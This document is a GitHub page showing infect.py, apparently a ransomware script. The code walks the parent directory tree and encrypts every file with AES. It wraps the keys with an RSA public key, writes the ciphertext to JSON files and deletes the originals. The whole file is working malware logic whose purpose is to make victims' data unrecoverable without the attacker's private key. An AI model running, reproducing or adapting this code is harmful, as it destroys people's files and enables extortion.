-
Notifications
You must be signed in to change notification settings - Fork 1
/
infect.py
57 lines (39 loc) · 1.68 KB
/
infect.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
from base64 import b64encode, b64decode
import os, json, requests, cryptools, constants
HMAC_KEY = os.urandom(constants.HMAC_KEY_LENGTH)
AES_KEY = os.urandom(constants.AES_KEY_LENGTH)
INITIALIZATION_VECTOR = os.urandom(constants.IV_LENGTH)
OUTSIDE_DIRECTORY = ".."
CIPHER = cryptools.RSAEncryptor()
def AESEncrypt(plaintext):
cipher = cryptools.FileEncryptor(AES_KEY, INITIALIZATION_VECTOR)
padded_text = cryptools.pad(plaintext)
return cipher.update(padded_text) + cipher.finalize()
def RSAEncrypt(plaintext):
return CIPHER.encrypt(
plaintext,
cryptools.oaep()
)
for current_directory, sub_directories, sub_files in os.walk(OUTSIDE_DIRECTORY):
if 'ransomware' in current_directory.lower():
continue
for file in sub_files:
if 'json' in file:
continue
fileName = ''.join(file.split('.')[:-1])
ext = file.split('.')[-1]
if len(file.split('.')) == 0 or file.endswith('json'):
continue
json_dict = dict()
with open(os.path.join(current_directory, file), 'rb') as f:
ciphertext = AESEncrypt(f.read())
tag = cryptools.HMAC(ciphertext, HMAC_KEY)
encrypted_keys = RSAEncrypt(AES_KEY + HMAC_KEY)
json_dict['IV'] = b64encode(INITIALIZATION_VECTOR)
json_dict['KEY'] = b64encode(encrypted_keys)
json_dict['TAG'] = b64encode(tag)
json_dict['EXT'] = b64encode(ext, 'utf-8')
json_dict['CIPHERTEXT'] = b64encode(ciphertext)
with open(os.path.join(current_directory, fileName + '.json'), 'w') as json_file:
json.dump(json_dict, json_file)
os.remove(os.path.join(current_directory, file))